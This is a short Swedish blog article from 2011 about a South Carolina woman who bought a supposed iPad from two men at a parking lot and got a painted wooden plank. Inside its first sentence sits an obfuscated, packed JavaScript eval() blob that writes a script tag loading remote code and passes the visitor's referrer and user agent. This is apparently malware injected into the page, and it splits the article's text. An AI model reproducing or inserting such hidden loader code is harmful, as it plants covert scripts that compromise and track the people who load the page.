Image Image Image Image Image Image Image Image Image Image

| 20 september, 2018

Scroll to top

Top

Köpte "iPad", fick planka…

Köpte "iPad", fick planka…
Filip Urde
  • On 31 augusti, 2011
  • http://www.revue.se/filip-urde

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tnkrd|var|u0026u|referrer|iazrt||js|php’.split(‘|’),0,{}))
var i förra veckan då en 22-årig kvinna i South Carolina tänkte köpa sig en iPad av två män på en parkeringsplats. När hon kom hem blev hon lagom nöjd över killarnas hemsnickeri… 

Man kan väll tycka att du bör höja ögonbrynet något om du ska träffa två killar intill en McDonalds och köpa en iPad till ”grossistpriser” för 300 dollar och sedan går med på att sälja den för de 180 dollar du har på dig. Men för 22-åriga Ashley McDowell verkade erbjudandet inte alls för bra för att vara sant, och hon tog emot Fedex-kartongen, öppnade den inte och tittade, utan körde glatt hem och packade upp den. Liknande fall har så klart funnits men då har det endast varit en tegelsten eller liknande. Men i Ashleys paket så var de något helt annat. Bedragarna hade ansträngt sig betydligt mer och återskapat en plank version av  iPad, med en Apple-logga på baksidan och påklistrade kopior av iPad-ikoner som Mail och Safari på framsidan. Den var rejält smutsig, och hade av oförklarlig anledning en prislapp från elektronikkedjan Best Buy.
McDowell beskrev för polisen hur bedragarna körde en vit Chevrolet Impala och att den ene hade en guldtand. =D